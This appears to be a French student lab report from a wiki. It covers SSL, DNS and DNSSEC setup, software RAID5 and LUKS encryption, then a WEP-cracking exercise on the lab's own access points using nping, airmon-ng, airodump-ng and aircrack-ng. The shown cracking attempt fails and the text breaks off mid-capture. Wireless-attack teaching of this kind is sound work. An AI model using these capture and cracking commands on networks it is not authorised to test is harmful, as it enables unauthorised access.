Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2&lt;br /&gt;
&lt;br /&gt;
Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
# This file describes the network interfaces available on your system&lt;br /&gt;
# and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlx000fb5922374&lt;br /&gt;
iface wlx000fb5922374 inet static&lt;br /&gt;
 wireless-keymode open&lt;br /&gt;
 wireless-mode managed&lt;br /&gt;
 address 10.2.0.100&lt;br /&gt;
 netmask 255.255.0.0&lt;br /&gt;
 wireless-essid banane&lt;br /&gt;
 wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
airmon-ng start wlx000fb5922374&lt;br /&gt;
root@zabeth17:/home/pifou# iwconfig&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethea48f02  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethc680cf4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth27a815a  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth3773236  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethf9b8093  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.447 GHz  Tx-Power=15 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          &lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethb5bee00  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth12b76b4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pifou@zabeth15:~$ su&lt;br /&gt;
Password: &lt;br /&gt;
root@zabeth15:/home/pifou# iwconfig&lt;br /&gt;
vethbecbb63  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlx000fb5922266  IEEE 802.11  ESSID:off/any  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266&lt;br /&gt;
&lt;br /&gt;
Found 3 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to run 'airmon-ng check kill'&lt;br /&gt;
&lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
&lt;br /&gt;
PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
&lt;br /&gt;
		(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
		(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
# -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
# -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
